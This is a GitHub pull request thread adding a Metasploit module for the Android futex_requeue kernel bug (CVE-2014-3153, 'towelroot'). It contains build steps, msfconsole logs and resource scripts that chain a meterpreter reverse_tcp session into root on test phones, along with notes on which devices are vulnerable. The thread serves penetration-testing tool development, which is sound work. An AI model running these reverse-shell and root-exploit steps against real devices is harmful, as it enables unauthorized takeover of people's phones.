### PR TITLE
add exploit for CVE-2014-3153, futex_requeue bug, towelroot.

### PR DESCRIPTION
**Pull request by timwr**
This pr contains a proof of concept of CVE-2014-3153, which is a local privilege escalation exploit for Android.
- [x] Download the Android NDK (I've been using android-ndk-r9c, http://dl.google.com/android/ndk/android-ndk-r9c-linux-x86_64.tar.bz2), put ndk-build on your path, and run "make" in external/source/exploits/CVE-2014-3153 to build the exploit (binaries not included).
- [x] Checkout and build https://github.com/rapid7/metasploit-javapayload/pull/23
- [x] Get an android meterpreter session and run the exploit.
- [x] You should get a system session running as uid 0, unfortunately no android.\* classes can be loaded so things like webcam_snap are unavailable, however you should have full access to the filesystem.
- [x] Tested on a fully updated Nexus 7 tablet running 4.4.4
- [ ] Check that the webview_addjavascriptinterface exploit still works as before

### CODE REVIEW

**Comment by timwr** [comment]
Bump! Has anyone tried this yet? Let me know if there are any issues with building/testing. 
@comex, @geohot. Would love to know what you guys think of this pull request.
Also pinging @jduck, would be cool to see the result of this on your droid army.

**Comment by bcook-r7** [comment]
Thanks @timwr, I only got as far as step one so far. Thanks for the offer, I'll let you know if I run into any problems.

**Comment by bcook-r7** [comment]
So, I'm a little confused by this behavior, so feel free to point out what bone-headed thing I did wrong, please :)

```
msf > use exploit/android/local/futex_requeue
msf exploit(futex_requeue) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(futex_requeue) > info

       Name: Android futex requeue kernel exploit
     Module: exploit/android/local/futex_requeue
   Platform: Android
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  Pinkie Pie
  geohot
  timwr

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name         Current Setting   Required  Description
  ----         ---------------   --------  -----------
  SESSION                        yes       The session to run this module on.
  WritableDir  /data/local/tmp/  yes       Temporary directory to write files

Payload information:

Description:
  This module exploits a bug in futex_requeue in the linux kernel. Any
  android phone with a kernel built before June 2014 should be
  vulnerable.

References:
  http://cvedetails.com/cve/2014-3153/
  http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/
  http://blog.nativeflow.com/the-futex-vulnerability

msf exploit(futex_requeue) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(futex_requeue) > run

[-] Exploit failed: The following options failed to validate: SESSION.
msf exploit(futex_requeue) > set SESSION 1
SESSION => 1
msf exploit(futex_requeue) > run

[-] Exploit failed: The following options failed to validate: LHOST.
msf exploit(futex_requeue) > set LHOST 192.168.22.66
LHOST => 192.168.22.66
msf exploit(futex_requeue) > run

[-] Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION.
```

**Comment by bcook-r7** [comment]
Ah, got it I think:
```
meterpreter > getuid
Server username: root
```

**Comment by timwr** [comment]
The getuid thing is a bug, a normal meterpreter session does that too. Are you sure you've got the right session id?

**Comment by bcook-r7** [comment]
Roger that, I switched to checking the id in a shell. I haven't gotten my hands on a device it works on yet, but I'll keep trying.

**Comment by geohot** [comment]
Hah, the reverse engineered towelroot source is nicer than the original :)

**Comment by bcook-r7** [comment]
So, my possibly naive RC script is something like this:

```
use exploit/multi/handler.
set payload android/meterpreter/reverse_tcp
set lhost 192.168.2.1
run -j
sleep 10
use exploit/android/local/futex_requeue.
set payload android/meterpreter/reverse_tcp.
set session 1
set lhost 192.168.2.1
set lport 4445
```

Results tend toward this:
```
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.2.1
lhost => 192.168.2.1
msf exploit(handler) > run

[*] Started reverse handler on 192.168.2.1:4444
[*] Starting the payload handler...
[*] Sending stage (43586 bytes) to 192.168.2.2

meterpreter > sysinfo
Computer    : localhost
OS          : Android 4.4.2 - Linux 3.4.0+ (armv7l)
Meterpreter : java/android
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/android/local/futex_requeue
msf exploit(futex_requeue) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(futex_requeue) > set session 1
session => 1
msf exploit(futex_requeue) > set lhost 192.168.2.1
lhost => 192.168.2.1
msf exploit(futex_requeue) > run

[*] Started reverse handler on 192.168.2.1:4444
[-] Exploit failed: Rex::TimeoutError Operation timed out.
```

Perhaps you wouldn't mind posting the script you tested with @timwr ?

**Comment by nmonkee** [comment]
Definitely a vulnerable device?

**Comment by bcook-r7** [comment]
I'm leaning toward something else going wrong, since this also kills session 1, but the device doesn't reboot or seem otherwise affected.

**Comment by timwr** [comment]
Thanks for testing! I've been testing with the following script:
```
use exploit/multi/handler
set ExitOnSession false
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.1
set LPORT 5556
exploit -j
#(wait for a wild session to appear)
use exploit/android/local/futex_requeue
set LHOST 192.168.1.1
set LPORT 5557
set session 1
exploit
```
Most devices before 5.0 (lollipop) should be vulnerable (I've tested with the Nexus 5, Nexus 7, Galaxy S4) however the current code is missing the mod_string functionality which will cause a reboot rather than a shell in a lot of other (vulnerable) devices (I've got hold of a HTC Desire HD).

@geohot thanks for your feedback! I suspect the code is cleaner because it's missing mod_strings. I'm curious as to how you managed to avoid the reboot in later versions of towelroot, did you repair the waiter queue or just leave process running?

If the device is not vulnerable it may well leave the session hanging, which will timeout and die, which is not ideal. I'm happy to fix this and the getuid bug before landing this.

If you want to test whether the device is vulnerable just attach it with adb and run ```make test``` in the external/source/exploits/CVE-2014-3153/ folder of this pr.

**Comment by bcook-r7** [comment]
Ah - finally got it to at least fail properly (phone rebooted rather than simply looked at me blankly).  I had the current/old java payload in my framework, which is why it actually kept hanging on file upload.

**Comment by bcook-r7** [comment]
Got it to work on a Nexus 4 using the factory 4.4.4 image :)

```
[*] Processing ./towel.rc for ERB directives.
resource (./towel.rc)> sleep 1
resource (./towel.rc)> use exploit/multi/handler
resource (./towel.rc)> set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
resource (./towel.rc)> set lhost 192.168.22.66
lhost => 192.168.22.66
resource (./towel.rc)> run
[*] Started reverse handler on 192.168.22.66:4444
[*] Starting the payload handler...
[*] Sending stage (44552 bytes) to 192.168.22.42

meterpreter > background
[*] Backgrounding session 1...
resource (./towel.rc)> use exploit/android/local/futex_requeue
resource (./towel.rc)> set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
resource (./towel.rc)> set WriteableDir /data/data/com.metasploit.stage/files/
WriteableDir => /data/data/com.metasploit.stage/files/
resource (./towel.rc)> set session 1
session => 1
resource (./towel.rc)> set lhost 192.168.22.66
lhost => 192.168.22.66
resource (./towel.rc)> set lport 4445
lport => 4445
resource (./towel.rc)> run

[*] Started reverse handler on 192.168.22.66:4445
[*] Sending stage (44552 bytes) to 192.168.22.42

meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),50080(all_a80) context=u:r:untrusted_app:s0
```

File: external/source/exploits/CVE-2014-3153/Makefile [hunk 1]
```diff
@@ -0,0 +1,17 @@
+
+all: install
+
+build:
+	ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk
```
Comment (bcook-r7) [inline external/source/exploits/CVE-2014-3153/Makefile]: As of Dec 2014, GCC 4.8 became the default toolchain for NDK, and it no longer supports the '-mno-thumb' flag.
This should either say explicitly NDK_TOOLCHAIN_VERSION=4.6 or just remove '-mno-thumb' from Android.mk. I tested it with 4.8 and it worked fine.

**Comment by timwr** [comment]
Apologies I've hurt my fingers in a freak drone accident so can't type for a bit. I'll remove the -mno-thumb asap.

**Comment by kernelsmith** [comment]
git add brain-keyboard interface

**Comment by todb** [comment]
Dang @timwr, if true, that's the most cyberpunk injury I've heard of all
week.

**Comment by bcook-r7** [comment]
I think you interpreted -mno-thumb too literally :)

I can fixup with your blessing if you like.

**Comment by kernelsmith** [comment]
This is all I can picture in my head:  http://youtu.be/lgJEcxE7KAc?t=3s

**Comment by timwr** [comment]
I'd love a brain keyboard interface right now. @bcook-r7 you have my blessing to fix up and land, many thanks!

**Comment by timwr** [comment]
Awesome! Thanks @bcook-r7 :)

**Comment by bcook-r7** [comment]
You're welcome - thanks for the help and all the work you did on this!

**Review by flaan4me — COMMENTED** [review]
Y

**Pull request merged**